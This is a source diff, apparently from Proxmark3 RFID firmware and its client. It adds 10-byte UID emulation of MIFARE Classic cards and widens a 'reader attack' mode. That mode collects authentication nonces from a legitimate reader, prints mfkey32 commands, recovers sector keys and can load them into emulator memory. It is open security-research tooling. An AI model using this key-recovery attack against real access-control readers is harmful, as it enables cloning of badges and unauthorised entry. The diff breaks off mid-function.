#include "util.h"
#include "string.h"
#include "cmd.h"
-
#include "iso14443crc.h"
#include "iso14443a.h"
#include "crapto1.h"
#include "mifareutil.h"
#include "BigBuf.h"
+#include "protocols.h"
+
static uint32_t iso14a_timeout;
int rsamples = 0;
uint8_t trigger = 0;
*
*@param flags :
* FLAG_INTERACTIVE - In interactive mode, we are expected to finish the operation with an ACK
- * 4B_FLAG_UID_IN_DATA - means that there is a 4-byte UID in the data-section, we're expected to use that
- * 7B_FLAG_UID_IN_DATA - means that there is a 7-byte UID in the data-section, we're expected to use that
+ * FLAG_4B_UID_IN_DATA - means that there is a 4-byte UID in the data-section, we're expected to use that
+ * FLAG_7B_UID_IN_DATA - means that there is a 7-byte UID in the data-section, we're expected to use that
+ * FLAG_10B_UID_IN_DATA - use 10-byte UID in the data-section not finished
* FLAG_NR_AR_ATTACK - means we should collect NR_AR responses for bruteforcing later
- *@param exitAfterNReads, exit simulation after n blocks have been read, 0 is inifite
+ *@param exitAfterNReads, exit simulation after n blocks have been read, 0 is infinite ...
+ * (unless reader attack mode enabled then it runs util it gets enough nonces to recover all keys attmpted)
*/
void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *datain)
{
int cardSTATE = MFEMUL_NOFIELD;
+ int _UID_LEN = 0; // 4, 7, 10
int _7BUID = 0;
int vHf = 0; // in mV
int res;
uint8_t rATQA[] = {0x04, 0x00}; // Mifare classic 1k 4BUID
uint8_t rUIDBCC1[] = {0xde, 0xad, 0xbe, 0xaf, 0x62};
uint8_t rUIDBCC2[] = {0xde, 0xad, 0xbe, 0xaf, 0x62}; // !!!
+ uint8_t rUIDBCC3[] = {0xde, 0xad, 0xbe, 0xaf, 0x62};
+
uint8_t rSAK[] = {0x08, 0xb6, 0xdd};
uint8_t rSAK1[] = {0x04, 0xda, 0x17};
+ uint8_t rSAK2[] = {0x04, 0xda, 0x17}; //need to look up
uint8_t rAUTH_NT[] = {0x01, 0x02, 0x03, 0x04};
uint8_t rAUTH_AT[] = {0x00, 0x00, 0x00, 0x00};
//Here, we collect UID,sector,keytype,NT,AR,NR,NT2,AR2,NR2
- // This can be used in a reader-only attack.
- // (it can also be retrieved via 'hf 14a list', but hey...
-
- //allow collecting up to 4 sets of nonces to allow recovery of 4 keys (2 keyA & 2 keyB)
- // must be set in multiples of 2 (for 1 keyA and 1 keyB)
- #define ATTACK_KEY_COUNT 4
- nonces_t ar_nr_resp[ATTACK_KEY_COUNT];
+ // This will be used in the reader-only attack.
+
+ //allow collecting up to 8 sets of nonces to allow recovery of 8 keys
+ #define ATTACK_KEY_COUNT 8
+ nonces_t ar_nr_resp[ATTACK_KEY_COUNT*2]; //*2 for 2 separate attack types
memset(ar_nr_resp, 0x00, sizeof(ar_nr_resp));
- uint8_t ar_nr_collected[ATTACK_KEY_COUNT];
+ uint8_t ar_nr_collected[ATTACK_KEY_COUNT*2];
memset(ar_nr_collected, 0x00, sizeof(ar_nr_collected));
+ bool collectMoebius = false;
+ uint8_t nonce1_count = 0;
+ uint8_t nonce2_count = 0;
+ uint8_t moebius_n_count = 0;
+ uint8_t mM = 0; //moebius_modifier for collection storage
+
// Authenticate response - nonce
uint32_t nonce = bytes_to_num(rAUTH_NT, 4);
// 4B uid comes from data-portion of packet
memcpy(rUIDBCC1,datain,4);
rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
-
+ _UID_LEN = 4;
} else if (flags & FLAG_7B_UID_IN_DATA) {
// 7B uid comes from data-portion of packet
memcpy(&rUIDBCC1[1],datain,3);
memcpy(rUIDBCC2, datain+3, 4);
_7BUID = true;
+ _UID_LEN = 7;
+ } else if (flags & FLAG_10B_UID_IN_DATA) {
+ memcpy(&rUIDBCC1[1], datain, 3);
+ memcpy(&rUIDBCC2[1], datain+3, 3);
+ memcpy( rUIDBCC3, datain+6, 4);
+ _UID_LEN = 10;
} else {
- // get UID from emul memory
+ // get UID from emul memory - guess at length
emlGetMemBt(receivedCmd, 7, 1);
_7BUID = !(receivedCmd[0] == 0x00);
if (!_7BUID) { // ---------- 4BUID
emlGetMemBt(rUIDBCC1, 0, 4);
+ _UID_LEN = 4;
} else { // ---------- 7BUID
emlGetMemBt(&rUIDBCC1[1], 0, 3);
emlGetMemBt(rUIDBCC2, 3, 4);
+ _UID_LEN = 7;
}
}
- /*
- * Regardless of what method was used to set the UID, set fifth byte and modify
- * the ATQA for 4 or 7-byte UID
- */
- rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
- if (_7BUID) {
- rATQA[0] = 0x44;
- rUIDBCC1[0] = 0x88;
- rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
- rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3];
- }
-
- if (MF_DBGLEVEL >= 1) {
- if (!_7BUID) {
- Dbprintf("4B UID: %02x%02x%02x%02x",
- rUIDBCC1[0], rUIDBCC1[1], rUIDBCC1[2], rUIDBCC1[3]);
- } else {
- Dbprintf("7B UID: (%02x)%02x%02x%02x%02x%02x%02x%02x",
- rUIDBCC1[0], rUIDBCC1[1], rUIDBCC1[2], rUIDBCC1[3],
- rUIDBCC2[0], rUIDBCC2[1] ,rUIDBCC2[2], rUIDBCC2[3]);
- }
+ switch (_UID_LEN) {
+ case 4:
+ // save CUID
+ cuid = bytes_to_num(rUIDBCC1, 4);
+ // BCC
+ rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
+ if (MF_DBGLEVEL >= 2) {
+ Dbprintf("4B UID: %02x%02x%02x%02x",
+ rUIDBCC1[0],
+ rUIDBCC1[1],
+ rUIDBCC1[2],
+ rUIDBCC1[3]
+ );
+ }
+ break;
+ case 7:
+ rATQA[0] |= 0x40;
+ // save CUID
+ cuid = bytes_to_num(rUIDBCC2, 4);
+ // CascadeTag, CT
+ rUIDBCC1[0] = 0x88;
+ // BCC
+ rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
+ rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3];
+ if (MF_DBGLEVEL >= 2) {
+ Dbprintf("7B UID: %02x %02x %02x %02x %02x %02x %02x",
+ rUIDBCC1[1],
+ rUIDBCC1[2],
+ rUIDBCC1[3],
+ rUIDBCC2[0],
+ rUIDBCC2[1],
+ rUIDBCC2[2],
+ rUIDBCC2[3]
+ );
+ }
+ break;
+ case 10:
+ rATQA[0] |= 0x80;
+ //sak_10[0] &= 0xFB;
+ // save CUID
+ cuid = bytes_to_num(rUIDBCC3, 4);
+ // CascadeTag, CT
+ rUIDBCC1[0] = 0x88;
+ rUIDBCC2[0] = 0x88;
+ // BCC
+ rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
+ rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3];
+ rUIDBCC3[4] = rUIDBCC3[0] ^ rUIDBCC3[1] ^ rUIDBCC3[2] ^ rUIDBCC3[3];
+
+ if (MF_DBGLEVEL >= 2) {
+ Dbprintf("10B UID: %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x",
+ rUIDBCC1[1],
+ rUIDBCC1[2],
+ rUIDBCC1[3],
+ rUIDBCC2[1],
+ rUIDBCC2[2],
+ rUIDBCC2[3],
+ rUIDBCC3[0],
+ rUIDBCC3[1],
+ rUIDBCC3[2],
+ rUIDBCC3[3]
+ );
+ }
+ break;
+ default:
+ break;
}
// We need to listen to the high-frequency, peak-detected path.
clear_trace();
set_tracing(TRUE);
-
bool finished = FALSE;
- while (!BUTTON_PRESS() && !finished) {
+ while (!BUTTON_PRESS() && !finished && !usb_poll_validate_length()) {
WDT_HIT();
// find reader field
LED_A_ON();
}
}
- if(cardSTATE == MFEMUL_NOFIELD) continue;
+ if (cardSTATE == MFEMUL_NOFIELD) continue;
//Now, get data
-
res = EmGetCmd(receivedCmd, &len, receivedCmd_par);
if (res == 2) { //Field is off!
cardSTATE = MFEMUL_NOFIELD;
}
// REQ or WUP request in ANY state and WUP in HALTED state
- if (len == 1 && ((receivedCmd[0] == 0x26 && cardSTATE != MFEMUL_HALTED) || receivedCmd[0] == 0x52)) {
+ if (len == 1 && ((receivedCmd[0] == ISO14443A_CMD_REQA && cardSTATE != MFEMUL_HALTED) || receivedCmd[0] == ISO14443A_CMD_WUPA)) {
selTimer = GetTickCount();
- EmSendCmdEx(rATQA, sizeof(rATQA), (receivedCmd[0] == 0x52));
+ EmSendCmdEx(rATQA, sizeof(rATQA), (receivedCmd[0] == ISO14443A_CMD_WUPA));
cardSTATE = MFEMUL_SELECT1;
// init crypto block
Dbprintf("SELECT %02x%02x%02x%02x received",receivedCmd[2],receivedCmd[3],receivedCmd[4],receivedCmd[5]);
}
// select card
+ // check correct sak values... (marshmellow)
if (len == 9 &&
(receivedCmd[0] == 0x93 && receivedCmd[1] == 0x70 && memcmp(&receivedCmd[2], rUIDBCC1, 4) == 0)) {
- EmSendCmd(_7BUID?rSAK1:rSAK, _7BUID?sizeof(rSAK1):sizeof(rSAK));
- cuid = bytes_to_num(rUIDBCC1, 4);
- if (!_7BUID) {
- cardSTATE = MFEMUL_WORK;
- LED_B_ON();
- if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol1 time: %d", GetTickCount() - selTimer);
- break;
- } else {
- cardSTATE = MFEMUL_SELECT2;
+ switch(_UID_LEN) {
+ case 4:
+ cardSTATE = MFEMUL_WORK;
+ LED_B_ON();
+ if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol1 time: %d", GetTickCount() - selTimer);
+ EmSendCmd(rSAK, sizeof(rSAK));
+ break;
+ case 7:
+ cardSTATE = MFEMUL_SELECT2;
+ EmSendCmd(rSAK1, sizeof(rSAK1));
+ break;
+ case 10:
+ cardSTATE = MFEMUL_SELECT2;
+ EmSendCmd(rSAK2, sizeof(rSAK2));
+ break;
+ default:break;
}
+ } else {
+ cardSTATE_TO_IDLE();
}
break;
}
+ case MFEMUL_SELECT3:{
+ if (!len) {
+ LogTrace(Uart.output, Uart.len, Uart.startTime*16 - DELAY_AIR2ARM_AS_TAG, Uart.endTime*16 - DELAY_AIR2ARM_AS_TAG, Uart.parity, TRUE);
+ break;
+ }
+ if (len == 2 && (receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_3 && receivedCmd[1] == 0x20)) {
+ EmSendCmd(rUIDBCC3, sizeof(rUIDBCC3));
+ break;
+ }
+ if (len == 9 &&
+ (receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_3 &&
+ receivedCmd[1] == 0x70 &&
+ memcmp(&receivedCmd[2], rUIDBCC3, 4) == 0) ) {
+
+ EmSendCmd(rSAK2, sizeof(rSAK2));
+ cardSTATE = MFEMUL_WORK;
+ LED_B_ON();
+ if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol3 time: %d", GetTickCount() - selTimer);
+ break;
+ }
+ cardSTATE_TO_IDLE();
+ break;
+ }
case MFEMUL_AUTH1:{
if( len != 8)
{
break;
}
- uint32_t ar = bytes_to_num(receivedCmd, 4);
- uint32_t nr = bytes_to_num(&receivedCmd[4], 4);
+ uint32_t nr = bytes_to_num(receivedCmd, 4);
+ uint32_t ar = bytes_to_num(&receivedCmd[4], 4);
- //Collect AR/NR per key/sector
+ //Collect AR/NR per keytype & sector
if(flags & FLAG_NR_AR_ATTACK) {
for (uint8_t i = 0; i < ATTACK_KEY_COUNT; i++) {
- if(cardAUTHKEY > 0 && i < (ATTACK_KEY_COUNT/2) ) {
- i=ATTACK_KEY_COUNT/2; //keyB skip to keyB
- } else if (cardAUTHKEY == 0 && i == ATTACK_KEY_COUNT/2) {
- break; //should not get here - quit
- }
- // if first auth for sector, or matches sector of previous auth
- if ( ar_nr_collected[i]==0 || (cardAUTHSC == ar_nr_resp[i].sector && ar_nr_collected[i] > 0) ) {
- if(ar_nr_collected[i] < 2) {
- if(ar_nr_resp[ar_nr_collected[i]].ar != ar)
- {// Avoid duplicates... probably not necessary, ar should vary.
- if (ar_nr_collected[i]==0) {
- ar_nr_resp[i].cuid = cuid;
- ar_nr_resp[i].sector = cardAUTHSC;
- ar_nr_resp[i].nonce = nonce;
- ar_nr_resp[i].ar = ar;
- ar_nr_resp[i].nr = nr;
- } else {
- ar_nr_resp[i].ar2 = ar;
- ar_nr_resp[i].nr2 = nr;
+ if ( ar_nr_collected[i+mM]==0 || (cardAUTHSC == ar_nr_resp[i+mM].sector && cardAUTHKEY == ar_nr_resp[i+mM].keytype && ar_nr_collected[i+mM] > 0) ) {
+ // if first auth for sector, or matches sector and keytype of previous auth
+ if (ar_nr_collected[i+mM] < 2) {
+ // if we haven't already collected 2 nonces for this sector
+ if (ar_nr_resp[ar_nr_collected[i+mM]].ar != ar) {
+ // Avoid duplicates... probably not necessary, ar should vary.
+ if (ar_nr_collected[i+mM]==0) {
+ // first nonce collect
+ ar_nr_resp[i+mM].cuid = cuid;
+ ar_nr_resp[i+mM].sector = cardAUTHSC;
+ ar_nr_resp[i+mM].keytype = cardAUTHKEY;
+ ar_nr_resp[i+mM].nonce = nonce;
+ ar_nr_resp[i+mM].nr = nr;
+ ar_nr_resp[i+mM].ar = ar;
+ nonce1_count++;
+ //add this nonce to first moebius nonce
+ ar_nr_resp[i+ATTACK_KEY_COUNT].cuid = cuid;
+ ar_nr_resp[i+ATTACK_KEY_COUNT].sector = cardAUTHSC;
+ ar_nr_resp[i+ATTACK_KEY_COUNT].keytype = cardAUTHKEY;
+ ar_nr_resp[i+ATTACK_KEY_COUNT].nonce = nonce;
+ ar_nr_resp[i+ATTACK_KEY_COUNT].nr = nr;
+ ar_nr_resp[i+ATTACK_KEY_COUNT].ar = ar;
+ ar_nr_collected[i+ATTACK_KEY_COUNT]++;
+ } else { //second nonce collect (std and moebius)
+ ar_nr_resp[i+mM].nonce2 = nonce;
+ ar_nr_resp[i+mM].nr2 = nr;
+ ar_nr_resp[i+mM].ar2 = ar;
+ if (!collectMoebius) {
+ nonce2_count++;
+ //check if this was the last second nonce we need for std attack
+ if ( nonce2_count == nonce1_count ) {
+ //done collecting std test switch to moebius
+ collectMoebius = true;
+ mM = ATTACK_KEY_COUNT;
+ nonce = nonce*7;
+ }
+ } else {
+ moebius_n_count++;
+ //if we've collected all the nonces we need - finish.
+ if (nonce1_count == moebius_n_count) finished = true;
+ }
}
- ar_nr_collected[i]++;
+ ar_nr_collected[i+mM]++;
break;
}
+ } else { //already collected 2 nonces for sector - reader looping? - quit
+ //finished = true;
}
}
}
}
-
+
// --- crypto
- crypto1_word(pcs, ar , 1);
- cardRr = nr ^ crypto1_word(pcs, 0, 0);
+ crypto1_word(pcs, nr , 1);
+ cardRr = ar ^ crypto1_word(pcs, 0, 0);
// test if auth OK
if (cardRr != prng_successor(nonce, 64)){
// select 2 card
if (len == 9 &&
(receivedCmd[0] == 0x95 && receivedCmd[1] == 0x70 && memcmp(&receivedCmd[2], rUIDBCC2, 4) == 0)) {
+ //which sak now? (marshmellow)
EmSendCmd(rSAK, sizeof(rSAK));
- cuid = bytes_to_num(rUIDBCC2, 4);
- cardSTATE = MFEMUL_WORK;
- LED_B_ON();
- if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol2 time: %d", GetTickCount() - selTimer);
+ switch(_UID_LEN) {
+ case 7:
+ cardSTATE = MFEMUL_WORK;
+ LED_B_ON();
+ if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol2 time: %d", GetTickCount() - selTimer);
+ break;
+ case 10:
+ cardSTATE = MFEMUL_SELECT3;
+ break;
+ default:break;
+ }
break;
}
}
if (len == 4 && (receivedCmd[0] == 0x60 || receivedCmd[0] == 0x61)) {
+ if (receivedCmd[1] >= 16 * 4) {
+ //is this the correct response to an auth on a out of range block? marshmellow
+ EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA));
+ if (MF_DBGLEVEL >= 2) Dbprintf("Reader tried to operate (0x%02x) on out of range block: %d (0x%02x), nacking",receivedCmd[0],receivedCmd[1],receivedCmd[1]);
+ break;
+ }
+
authTimer = GetTickCount();
cardAUTHSC = receivedCmd[1] / 4; // received block num
cardAUTHKEY = receivedCmd[0] - 0x60;
crypto1_destroy(pcs);//Added by martin
crypto1_create(pcs, emlGetKey(cardAUTHSC, cardAUTHKEY));
+ //uint64_t key=emlGetKey(cardAUTHSC, cardAUTHKEY);
+ //Dbprintf("key: %04x%08x",(uint32_t)(key>>32)&0xFFFF,(uint32_t)(key&0xFFFFFFFF));
if (!encrypted_data) { // first authentication
if (MF_DBGLEVEL >= 4) Dbprintf("Reader authenticating for block %d (0x%02x) with key %d",receivedCmd[1] ,receivedCmd[1],cardAUTHKEY );
Dbprintf("../tools/mfkey/mfkey32 %08x %08x %08x %08x %08x %08x",
ar_nr_resp[i].cuid, //UID
ar_nr_resp[i].nonce, //NT
- ar_nr_resp[i].ar, //AR1
ar_nr_resp[i].nr, //NR1
- ar_nr_resp[i].ar2, //AR2
- ar_nr_resp[i].nr2 //NR2
+ ar_nr_resp[i].ar, //AR1
+ ar_nr_resp[i].nr2, //NR2
+ ar_nr_resp[i].ar2 //AR2
);
}
}
+ for ( uint8_t i = ATTACK_KEY_COUNT; i < ATTACK_KEY_COUNT*2; i++) {
+ if (ar_nr_collected[i] == 2) {
+ Dbprintf("Collected two pairs of AR/NR which can be used to extract %s from reader for sector %d:", (i<ATTACK_KEY_COUNT/2) ? "keyA" : "keyB", ar_nr_resp[i].sector);
+ Dbprintf("../tools/mfkey/mfkey32v2 %08x %08x %08x %08x %08x %08x %08x",
+ ar_nr_resp[i].cuid, //UID
+ ar_nr_resp[i].nonce, //NT
+ ar_nr_resp[i].nr, //NR1
+ ar_nr_resp[i].ar, //AR1
+ ar_nr_resp[i].nonce2,//NT2
+ ar_nr_resp[i].nr2, //NR2
+ ar_nr_resp[i].ar2 //AR2
+ );
+ }
+ }
}
if (MF_DBGLEVEL >= 1) Dbprintf("Emulator stopped. Tracing: %d trace length: %d ", tracing, BigBuf_get_traceLen());
if(flags & FLAG_INTERACTIVE)// Interactive mode flag, means we need to send ACK
{
- //May just aswell send the collected ar_nr in the response aswell
+ //Send the collected ar_nr in the response
cmd_send(CMD_ACK,CMD_SIMULATE_MIFARE_CARD,0,0,&ar_nr_resp,sizeof(ar_nr_resp));
}
#define MFEMUL_IDLE 1\r
#define MFEMUL_SELECT1 2\r
#define MFEMUL_SELECT2 3\r
-#define MFEMUL_AUTH1 4\r
-#define MFEMUL_AUTH2 5\r
-#define MFEMUL_WORK 6\r
-#define MFEMUL_WRITEBL2 7\r
-#define MFEMUL_INTREG_INC 8\r
-#define MFEMUL_INTREG_DEC 9\r
-#define MFEMUL_INTREG_REST 10\r
-#define MFEMUL_HALTED 11\r
+#define MFEMUL_SELECT3 4\r
+#define MFEMUL_AUTH1 5\r
+#define MFEMUL_AUTH2 6\r
+#define MFEMUL_WORK 7\r
+#define MFEMUL_WRITEBL2 8\r
+#define MFEMUL_INTREG_INC 9\r
+#define MFEMUL_INTREG_DEC 10\r
+#define MFEMUL_INTREG_REST 11\r
+#define MFEMUL_HALTED 12\r
\r
#define cardSTATE_TO_IDLE() cardSTATE = MFEMUL_IDLE; LED_B_OFF(); LED_C_OFF();\r
\r
return 0;\r
}\r
\r
+int usage_hf14_mf1ksim(void){\r
+ PrintAndLog("Usage: hf mf sim [h] u <uid (8,14 hex symbols)> n <numreads> i x");\r
+ PrintAndLog("options:");\r
+ PrintAndLog(" h this help");\r
+ PrintAndLog(" u (Optional) UID 4,7 bytes. If not specified, the UID 4b from emulator memory will be used");\r
+ PrintAndLog(" n (Optional) Automatically exit simulation after <numreads> blocks have been read by reader. 0 = infinite");\r
+ PrintAndLog(" i (Optional) Interactive, means that console will not be returned until simulation finishes or is aborted");\r
+ PrintAndLog(" x (Optional) Crack, performs the 'reader attack', nr/ar attack against a legitimate reader, fishes out the key(s)");\r
+ PrintAndLog(" e (Optional) set keys found from 'reader attack' to emulator memory");\r
+ PrintAndLog("samples:");\r
+ PrintAndLog(" hf mf sim u 0a0a0a0a");\r
+ PrintAndLog(" hf mf sim u 11223344556677");\r
+ //PrintAndLog(" hf mf sim u 112233445566778899AA"); \r
+ return 0;\r
+}\r
+\r
int CmdHF14AMf1kSim(const char *Cmd)\r
{\r
- uint8_t uid[7] = {0, 0, 0, 0, 0, 0, 0};\r
+ #define ATTACK_KEY_COUNT 8\r
+ uint8_t uid[10] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0};\r
uint8_t exitAfterNReads = 0;\r
uint8_t flags = 0;\r
+ int uidlen = 0;\r
+ uint8_t pnr = 0;\r
+ bool setEmulatorMem = false;\r
\r
- uint8_t cmdp = param_getchar(Cmd, 0);\r
+ char cmdp = param_getchar(Cmd, pnr);\r
\r
- if (cmdp == 'h' || cmdp == 'H') {\r
- PrintAndLog("Usage: hf mf sim u <uid (8 hex symbols)> n <numreads> i x");\r
- PrintAndLog(" h this help");\r
- PrintAndLog(" u (Optional) UID. If not specified, the UID from emulator memory will be used");\r
- PrintAndLog(" n (Optional) Automatically exit simulation after <numreads> blocks have been read by reader. 0 = infinite");\r
- PrintAndLog(" i (Optional) Interactive, means that console will not be returned until simulation finishes or is aborted");\r
- PrintAndLog(" x (Optional) Crack, performs the 'reader attack', nr/ar attack against a legitimate reader, fishes out the key(s)");\r
- PrintAndLog("");\r
- PrintAndLog(" sample: hf mf sim u 0a0a0a0a ");\r
- return 0;\r
- }\r
- uint8_t pnr = 0;\r
- if (param_getchar(Cmd, pnr) == 'u') {\r
- if(param_gethex(Cmd, pnr+1, uid, 8) == 0)\r
- {\r
- flags |= FLAG_4B_UID_IN_DATA; // UID from packet\r
- } else if(param_gethex(Cmd,pnr+1,uid,14) == 0) {\r
- flags |= FLAG_7B_UID_IN_DATA;// UID from packet\r
- } else {\r
- PrintAndLog("UID, if specified, must include 8 or 14 HEX symbols");\r
- return 1;\r
+ if (cmdp == 'h' || cmdp == 'H') return usage_hf14_mf1ksim();\r
+\r
+ if (cmdp == 'u' || cmdp == 'U') {\r
+ param_gethex_ex(Cmd, pnr+1, uid, &uidlen);\r
+ switch(uidlen){\r
+ //case 20: flags = FLAG_10B_UID_IN_DATA; break; //not complete\r
+ case 14: flags = FLAG_7B_UID_IN_DATA; break;\r
+ case 8: flags = FLAG_4B_UID_IN_DATA; break;\r
+ default: return usage_hf14_mf1ksim();\r
}\r
pnr +=2;\r
}\r
- if (param_getchar(Cmd, pnr) == 'n') {\r
- exitAfterNReads = param_get8(Cmd,pnr+1);\r
+\r
+ cmdp = param_getchar(Cmd, pnr);\r
+ if (cmdp == 'n' || cmdp == 'N') {\r
+ exitAfterNReads = param_get8(Cmd, pnr+1);\r
pnr += 2;\r
}\r
- if (param_getchar(Cmd, pnr) == 'i' ) {\r
- //Using a flag to signal interactiveness, least significant bit\r
+\r
+ cmdp = param_getchar(Cmd, pnr);\r
+ if (cmdp == 'i' || cmdp == 'I' ) {\r
flags |= FLAG_INTERACTIVE;\r
pnr++;\r
}\r
\r
- if (param_getchar(Cmd, pnr) == 'x' ) {\r
- //Using a flag to signal interactiveness, least significant bit\r
+ cmdp = param_getchar(Cmd, pnr);\r
+ if (cmdp == 'x' || cmdp == 'X') {\r
flags |= FLAG_NR_AR_ATTACK;\r
}\r
+\r
+ cmdp = param_getchar(Cmd, pnr);\r
+ if (cmdp == 'e' || cmdp == 'E') {\r
+ setEmulatorMem = true;\r
+ }\r
+\r
PrintAndLog(" uid:%s, numreads:%d, flags:%d (0x%02x) ",\r
flags & FLAG_4B_UID_IN_DATA ? sprint_hex(uid,4):\r
- flags & FLAG_7B_UID_IN_DATA ? sprint_hex(uid,7): "N/A"\r
+ flags & FLAG_7B_UID_IN_DATA ? sprint_hex(uid,7): "N/A"\r
, exitAfterNReads, flags,flags);\r
\r
\r
UsbCommand c = {CMD_SIMULATE_MIFARE_CARD, {flags, exitAfterNReads,0}};\r
memcpy(c.d.asBytes, uid, sizeof(uid));\r
+ clearCommandBuffer();\r
SendCommand(&c);\r
\r
- if(flags & FLAG_INTERACTIVE)\r
- {\r
+ if(flags & FLAG_INTERACTIVE) {\r
UsbCommand resp;\r
PrintAndLog("Press pm3-button to abort simulation");\r
while(! WaitForResponseTimeout(CMD_ACK,&resp,1500)) {\r
}\r
//got a response\r
if (flags & FLAG_NR_AR_ATTACK) {\r
- typedef struct {\r
- uint32_t cuid;\r
- uint8_t sector;\r
- uint8_t keytype;\r
- uint32_t nonce;\r
- uint32_t ar;\r
- uint32_t nr;\r
- uint32_t nonce2;\r
- uint32_t ar2;\r
- uint32_t nr2;\r
- } nonces_t;\r
- nonces_t ar_resp[4];\r
- //uint32_t ar_responses[] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};\r
+ nonces_t ar_resp[ATTACK_KEY_COUNT*2];\r
uint64_t key = 0;\r
- //uint64_t keyB = 0;\r
- //uint8_t arnr_len = 8;\r
memcpy (ar_resp, resp.d.asBytes, sizeof(ar_resp));\r
- \r
- for (uint8_t i = 0; i<4; i++) {\r
+ typedef struct {\r
+ uint64_t keyA;\r
+ uint32_t security;\r
+ uint64_t keyB;\r
+ } st_t;\r
+ st_t sector_trailer[ATTACK_KEY_COUNT];\r
+ memset(sector_trailer, 0x00, sizeof(sector_trailer));\r
+\r
+ uint8_t stSector[ATTACK_KEY_COUNT];\r
+ memset(stSector, 0x00, sizeof(stSector));\r
+ uint8_t key_cnt[ATTACK_KEY_COUNT];\r
+ memset(key_cnt, 0x00, sizeof(key_cnt));\r
+\r
+ for (uint8_t i = 0; i<ATTACK_KEY_COUNT; i++) {\r
if (ar_resp[i].ar2 > 0) {\r
- key = mfkey32(ar_resp[i].cuid,ar_resp[i].nonce,ar_resp[i].ar,ar_resp[i].nr,ar_resp[i].ar2,ar_resp[i].nr2);\r
- if (key>0) {\r
- PrintAndLog("\nFound Key%s for sector %d: [%04x%08x]", (i<2) ? "A" : "B", ar_resp[i].sector, (uint32_t) (key>>32), (uint32_t) (key &0xFFFFFFFF));\r
- //set emulator memory for key\r
- } \r
+ //PrintAndLog("Trying sector %d, cuid %08x, nt %08x, ar %08x, nr %08x, ar2 %08x, nr2 %08x",ar_resp[i].sector, ar_resp[i].cuid,ar_resp[i].nonce,ar_resp[i].ar,ar_resp[i].nr,ar_resp[i].ar2,ar_resp[i].nr2);\r
+ if (mfkey32(ar_resp[i], &key)) {\r
+ PrintAndLog("Found Key%s for sector %d: [%04x%08x]", (ar_resp[i].keytype) ? "B" : "A", ar_resp[i].sector, (uint32_t) (key>>32), (uint32_t) (key &0xFFFFFFFF));\r
+\r
+ for (uint8_t ii = 0; ii<ATTACK_KEY_COUNT; ii++) {\r
+ if (key_cnt[ii]==0 || stSector[ii]==ar_resp[i].sector) {\r
+ if (ar_resp[i].keytype==0) {\r
+ //keyA\r
+ sector_trailer[ii].keyA = key;\r
+ stSector[ii] = ar_resp[i].sector;\r
+ key_cnt[ii]++;\r
+ break;\r
+ } else {\r
+ //keyB\r
+ sector_trailer[ii].keyB = key;\r
+ stSector[ii] = ar_resp[i].sector;\r
+ key_cnt[ii]++;\r
+ break;\r
+ }\r
+ }\r
+ }\r
+ }\r
}\r
}\r
- /*\r
- if (ar_resp[1] && ar_responses[2] && ar_responses[3] && ar_responses[6] && ar_responses[7]) {\r
- keyA = mfkey32(ar_responses[0],ar_responses[1],ar_responses[2],ar_responses[3],ar_responses[6],ar_responses[7]);\r
- if (keyA>0) {\r
- PrintAndLog("\nFound KeyA: [%04x%08x]\n\n", (uint32_t) (keyA>>32), (uint32_t) (keyA &0xFFFFFFFF));\r
- //set emulator memory for key\r
- } else {\r
- keyA = mfkey32(ar_responses[0],ar_responses[1],ar_responses[2],ar_responses[3],ar_responses[6],ar_responses[7]); \r
- if (keyA>0) {\r
- PrintAndLog("\nFound KeyA: [%04x%08x]\n\n", (uint32_t) (keyA>>32), (uint32_t) (keyA &0xFFFFFFFF));\r
- //set emulator memory for key\r
+ //set emulator memory for keys\r
+ if (setEmulatorMem) {\r
+ for (uint8_t i = 0; i<ATTACK_KEY_COUNT; i++) {\r
+ if (key_cnt[i]>0) {\r
+ //PrintAndLog ("block %d, keyA:%04x%08x, keyb:%04x%08x",stSector[i]*4+3, (uint32_t) (sector_trailer[i].keyA>>32), (uint32_t) (sector_trailer[i].keyA &0xFFFFFFFF),(uint32_t) (sector_trailer[i].keyB>>32), (uint32_t) (sector_trailer[i].keyB &0xFFFFFFFF));\r
+ uint8_t memBlock[16];\r
+ memset(memBlock, 0x00, sizeof(memBlock));\r
+ char cmd1[36];\r
+ memset(cmd1,0x00,sizeof(cmd1));\r
+ snprintf(cmd1,sizeof(cmd1),"%04x%08xFF078069%04x%08x",(uint32_t) (sector_trailer[i].keyA>>32), (uint32_t) (sector_trailer[i].keyA &0xFFFFFFFF),(uint32_t) (sector_trailer[i].keyB>>32), (uint32_t) (sector_trailer[i].keyB &0xFFFFFFFF));\r
+ //PrintAndLog("%s",cmd1);\r
+ if (param_gethex(cmd1, 0, memBlock, 32)) {\r
+ PrintAndLog("block data must include 32 HEX symbols");\r
+ return 1;\r
+ }\r
+ \r
